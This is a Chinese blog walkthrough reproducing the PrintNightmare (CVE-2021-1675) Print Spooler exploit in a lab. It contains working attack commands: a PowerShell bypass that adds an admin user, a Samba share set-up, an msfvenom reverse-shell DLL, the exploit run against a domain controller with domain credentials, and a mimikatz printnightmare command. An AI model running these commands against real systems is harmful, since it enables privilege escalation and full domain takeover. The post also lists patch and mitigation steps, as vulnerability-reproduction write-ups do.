Windows Print Spooler远程代码执行漏洞复现(CVE-2021-1675)

最新推荐文章于 2024-05-09 09:38:04 发布
最新推荐文章于 2024-05-09 09:38:04 发布
阅读量4.8k 收藏 10
点赞数 3
分类专栏: Windows系统安全 各种漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yangbz123/article/details/118492020
版权

目录

漏洞概述

Windows Print Spooler是Windows的打印机后台处理程序,广泛的应用于各种内网中,攻击者可以通过该漏洞绕过PfcAddPrinterDriver的安全验证,并在打印服务器中安装恶意的驱动程序。若攻击者所控制的用户在域中,则攻击者可以连接到DC中的Spooler服务,并利用该漏洞在DC中安装恶意的驱动程序,完整的控制整个域环境。
影响版本

Windows Server 2012 R2 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 (Server Core installation)
Windows Server 2012
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows RT 8.1
Windows 8.1 for x64-based systems
Windows 8.1 for 32-bit systems
Windows 7 for x64-based Systems Service Pack 1
Windows 7 for 32-bit Systems Service Pack 1
Windows Server 2016 (Server Core installation)
Windows Server 2016
Windows 10 Version 1607 for x64-based Systems
Windows 10 Version 1607 for 32-bit Systems
Windows 10 for x64-based Systems
Windows 10 for 32-bit Systems
Windows Server, version 20H2 (Server Core Installation)
Windows 10 Version 20H2 for ARM64-based Systems
Windows 10 Version 20H2 for 32-bit Systems
Windows 10 Version 20H2 for x64-based Systems
Windows Server, version 2004 (Server Core installation)
Windows 10 Version 2004 for x64-based Systems
Windows 10 Version 2004 for ARM64-based Systems
Windows 10 Version 2004 for 32-bit Systems
Windows 10 Version 21H1 for 32-bit Systems
Windows 10 Version 21H1 for ARM64-based Systems
Windows 10 Version 21H1 for x64-based Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows 10 Version 1909 for x64-based Systems
Windows 10 Version 1909 for 32-bit Systems
Windows Server 2019 (Server Core installation)
Windows Server 2019
Windows 10 Version 1809 for ARM64-based Systems
Windows 10 Version 1809 for x64-based Systems
Windows 10 Version 1809 for 32-bit Systems

漏洞复现

一、PowerShell脚本实现本地提权

1、确保Windows Print Spooler服务启用
运行输入“services.msc”打开服务,启用Print Spooler服务。
在这里插入图片描述
Exp
https://github.com/calebstewart/CVE-2021-1675

2、powershell绕过安全策略执行
本机实验环境为windows 10 1909专业版
powershell -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString(‘C:\Users\xxx\CVE-20 21-1675.ps1’); Invoke-Nightmare -DriverName “mac” -NewUser “hack” -NewPassword “hack123!”
在这里插入图片描述
已经添加到管理员组中
在这里插入图片描述
在这里插入图片描述

二、Windows Print Spooler RCE域控

1、域控环境为Windows server 2012 R2,域成员环境为window 7

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

2、此时已经拿到一个普通域成员用户,利用该漏洞去攻击域控服务器。
在这里插入图片描述

3、在攻击端设置好samba服务

[global]
workgroup = workgroup
server string = test
netbios name = MZ
security = user
map to guest = Bad User
smb ports = 445
log file = /var/log/samba/log.%m
max log size = 5

[smb]
comment = Samba
browseable = yes
writeable = yes
public = yes
path = /tmp/
read only = no
guest ok = yes

在这里插入图片描述
在这里插入图片描述

MSF上线

生成dll文件,放到共享目录tmp下
msfvenom -p windows/x64/shell_reverse_tcp lhost=ip lport=4444 -f dll -o payload.dll
在这里插入图片描述
设置监听
在这里插入图片描述
在这里插入图片描述

Windows server 2012貌似不行报Error: code: 0x5 - rpc_s_access_denied 错误,因为只能上传恶意dll文件,不能执行。
尝试Windows server 2019
Windows server 2019开启samba服务问题
https://cloud.tencent.com/developer/article/1528657
实验前关闭防火墙或者杀毒软件,方便实验
执行设置exp参数

CVE-2021-1675.py pte.com/testuser:123456Abc@192.168.1.10 '\\192.168.1.40\smb\payload.dll'
AD域名/普通域用户:用户密码@域控地址 ‘恶意dll文件共享地址’

在这里插入图片描述

Cobalt Strike上线

在这里插入图片描述

三、mimikatz武器化攻击

运行mimikatz,输入以下命令

misc::printnightmare /library:\\192.168.1.40\smb\payload.dll /server:192.168.1.10 /authuser:testuser /authdomain:pte.com /authpassword:123456Abc

这里就很奇怪他报错还能弹shell
在这里插入图片描述
在这里插入图片描述
在CS上线上就不报错。。。
在这里插入图片描述
在这里插入图片描述

漏洞防御

https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1675
禁用samba服务于Print Spooler服务
运行中输入”services.msc”选择print spooler服务禁用。
在这里插入图片描述

参考链接

GitHub - cube0x0/CVE-2021-1675: C# and Impacket implementation of CVE-2021-1675/PrintNightmare
CVE-2021-1675 Windows Spooler Service RCE (qq.com)
GitHub - calebstewart/CVE-2021-1675: Pure PowerShell implementation of CVE-2021-1675 Print Spooler Local Privilege Escalation (PrintNightmare)
https://github.com/gentilkiwi/mimikatz

bye_X
关注
  • 3
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
漏洞情报 | Windows Print Spooler 远程代码执行漏洞CVE-2021-1675)POC公开
爱国小白帽
06-29 1611
​ 点击上方 订阅话题 第一时间了解漏洞威胁 0x01 漏洞描述 Windows Print SpoolerWindows的打印机后台处理程序,广泛的应用于各种内网中。 微软在2021年6月的安全更新中修复了一处 Windows Print Spooler 远程代码执行漏洞CVE-2021-1675)。今天,360漏洞云监测到安全研究人员公布了该漏洞的POC。 该漏洞源于Windows Print Spooler未能正确地实施安全限制,攻击者可绕过RpcAddPrinterDriver的安全检查,在
Windows Print Spooler 被曝未修复 0day,可导致恶意软件以管理员权限运行
smellycat000的专栏
08-07 539
聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码卫士团队研究人员找到绕过Windows打印服务漏洞CVE-2020-1048补丁的方法,可导致攻击者以提升后的权限执行恶意代码...
打破安全防线:体验CVE-2021-1675CVE-2021-34527的 PrintNightmare 漏洞利用工具
最新发布
gitblog_00034的博客
05-09 359
打破安全防线:体验CVE-2021-1675CVE-2021-34527的 PrintNightmare 漏洞利用工具 项目地址:https://gitcode.com/cube0x0/CVE-2021-1675 项目介绍 深入技术安全领域的你,是否对最近的 PrintNightmare 漏洞有所耳闻?这个漏洞CVE-2021-1675CVE-2021-34527)影响了微软的打印服务,...
Windows Print Spooler CVE-2021-1675 漏洞复现
p01son的博客
07-26 669
Windows Print Spooler CVE-2021-1675 漏洞复现 Created: July 7, 2021 5:25 PM 漏洞描述 Windows Print SpoolerWindows的打印机后台处理程序,广泛的应用于各种内网中,攻击者可以通过该漏洞绕过PfcAddPrinterDriver的安全验证,并在打印服务器中安装恶意的驱动程序。若攻击者所控制的用户在域中,则攻击者可以连接到DC中的Spooler服务,并利用该漏洞DC中安装恶意的驱动程序,完整的控制整个域环境。 利用条件
CVE-2021-1675 Print Spooler漏洞复现远程执行及提权
m0_55937801的博客
04-09 5112
CVE-2021-1675
Windows Print Spooler服务最新漏洞CVE-2024-34527详解
2401_83621136的博客
04-01 199
这里记录域控环境下使用普通权限域账户实现RCE反弹nt authority\system shell的过程。下面的漏洞复现漏洞分析都是基于Windows server 2019,2021-6补丁的,winver=17763.1999。经笔者测试在无任何补丁的Windows server 2019,winver=17763.107环境下使用以下步骤也可以复现RCE。实现RCE的条件如下:1.一个普通权限的域账户,用另一台计算机使用该域账户登录加入域环境。其中域账户权限如下。
15张超详细的Python学习路线图,纯良心分享,新手小白学习宝典
m0_60452293的博客
04-13 374
是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!结合自身的学习经验以及与很多自学者的沟通了解,我们整理出。,供诸位尚未入门或刚入门不久的同学参考。
cve-2020-1337-poc:CVE-2020-1337的poc(Windows打印后台处理程序特权提升)
03-21
CVE-2020-1337是一个严重安全漏洞,影响了Microsoft Windows操作系统中的打印后台处理程序服务(Spooler Service)。这个漏洞允许攻击者在目标系统上提升权限,从非管理员权限升级到系统权限,从而可以执行任意代码...
PrintSpooler.zip_Print Spooler API_printspooler 代码_打印机_打印机监控
07-14
使用VS2012 C#语言,windows应用程序类别,利用win32 API对打印机进行监控,并实时输出打印信息到窗口
CVE-2020-1337:CVE-2020-1048旁路
03-09
Microsoft通过 (Windows Spooler漏洞,允许在Windows 7及更高版本上提升特权)认可了Peleg Hadar( )和Tomer Bar( )。 Alex Ionescu( )和Yarden Shafir( )在他很酷的博客中披露了一些详细信息。 利用这些...
fix print spooler v2.60.zip
12-31
"fix print spooler v2.60.zip" 是一个针对Windows操作系统的打印问题修复工具,版本号为2.6.0。这个压缩包包含了专为解决“Print Spooler”服务故障而设计的程序或脚本。Print SpoolerWindows系统中一个至关重要...
Oracle Database Server 'TNS Listener'远程数据投毒漏洞CVE-2012-1675)的解决文档
05-25
安全厂家给出的解决办法: 链接:http://www.oracle.com/technetwork/topics/security/alert-cve-2012-1675-1608180.html 根据此链接得到解决方法: ? 1234 SolutionRecommendations for protecting against this vulnerability can be found at:My Oracle Support Note 1340831.1 for Oracle Database deployments that use Oracle Real Application Clusters (RAC).My Oracle Support Note 1453883.1 for Oracle Database deployments that do not use RAC. 目前这里环境不是RAC,参考文档1453883.1: Using Class of Secure Transport (COST) to Restrict Instance Registration (
PPR Print Spooler-开源
07-03
PPR 是 PostScript 打印机的假脱机程序。 它支持 PPD 文件,并提供操作员警报、作业结果消息和错误恢复。 它与 Netatalk、CAP60、Samba 和 Ghostscript 集成。 它有命令行和网络界面。
oracle数据投毒,Oracle Database Server TNS Listener远程数据投毒漏洞CVE-2012-1675)的完美解决方法...
weixin_30813385的博客
04-03 615
环境:Windows 2008 R2 + Oracle 10.2.0.3应用最新bundle patch后,扫描依然报出漏洞 Oracle Database Server 'TNS Listener'远程数据投毒漏洞(CVE-2012-1675)•1.确定解决方案•2.应用解决方案•3.验证修补情况•4.Reference1.确定解决方案安全厂家给出的解决办法:链接:http://www.orac...
oracle tns远程投毒,Oracle TNS Listener Remote Poisoning 测试
weixin_33603823的博客
04-04 1104
远程数据投毒漏洞(CVE-2012-1675)允许***者在不提供用户名/密码的情况下,向远程“TNS Listener”组件处理的数据投毒的漏洞。COST 是class of secure transports 的缩写。是为了控制实例注册提供的一种安全控制机制。其作用是对于一个确定的listener,限制哪些实例通过哪些协议可以进行注册。这将避免有其他远程实例进行恶意注册,并由此产生信息泄露等风...
打印系统开发(62)——C# 实现虚拟打印机 HP Color LaserJet 4500 (1)
qq_34573534的博客
12-24 4177
C# 实现虚拟打印机 HP Color LaserJet 45001 无聊了研究了下PCL和HPGL两种语言。如果要实现虚拟打印机只使用.NET来做,驱动是最大的问题。其实我们可以使用已经写好的打印机驱动来实现。只是让驱动最终生成的打印语言输出到我们想要的位置。并且我们对打印语言进行模拟显示就可以。经过几天的研究发现HP Color LaserJet 4500 打印出的图形为PCL和H...
Windows 权限提升:PrintNightmare
weixin_46634434的博客
02-23 591
介绍 自从 Stuxnet 蠕虫利用 print spooler 的特权升级漏洞通过网络在伊朗的核浓缩离心机中传播并感染了 45000 多个网络以来,Print Spooler 就一直受到研究人员的关注。PrintNightmare 是 Microsoft Windows 操作系统中 Print Spooler 服务 (spoolsv.exe) 中远程代码执行漏洞的通用名称。该漏洞被分配了 CVE-2021-34527。最初,它被认为是本地权限提升 (LPE) 并分配了 CVE-2021-1675。LPE
漏洞复现PrintNightmare(CVE-2021-1675复现
weixin_42282189的博客
01-05 5298
作者: 飞天魔鬼 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x01 简介 Windows Print SpoolerWindows的打印机后台处理程序,广泛的应用于各种内网中,攻击者可以通过该漏洞绕过PfcAddPrinterDriver的安全验证,并在打印服务器中安装恶意的驱动程序。若攻击者所控制的用户在域中,则攻击者可以连接到DC中的Spooler服务,并利用该漏洞DC中安装恶意的驱动程序,完整的控制整个域环境。 环境准备 一个普通权限的域账户 目标开启.
Samba ‘dcerpc_read_ncacn_packet_done’函数缓冲区溢出漏洞
weixin_30244681的博客
12-13 212
漏洞名称: Samba ‘dcerpc_read_ncacn_packet_done’函数缓冲区溢出漏洞 CNNVD编号: CNNVD-201312-169 发布时间: 2013-12-12 更新时间: 2013-12-12 危害等级: 高危 漏洞类型: 缓冲区溢出 威胁类型: 特定网...
共享打印机漏洞怎么修复
03-29
共享打印机漏洞的修复方法如下: 1. 更新操作系统:更新操作系统可以修复已知的漏洞,并提高系统的安全性。在更新操作系统时,需要确保安装最新的补丁和安全更新。 2. 更改默认凭据:共享打印机漏洞的一个主要原因是默认凭据的使用。更改默认凭据可以增强系统的安全性。 3. 添加访问控制列表(ACL):ACL可以控制用户对共享打印机的访问权限。通过添加ACL,可以限制非授权用户的访问,从而增强安全性。 4. 启用防火墙:启用防火墙可以限制非授权用户的访问,从而增强系统的安全性。 5. 禁用文件和打印机共享:禁用文件和打印机共享可以防止共享打印机漏洞的利用,增强系统的安全性。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值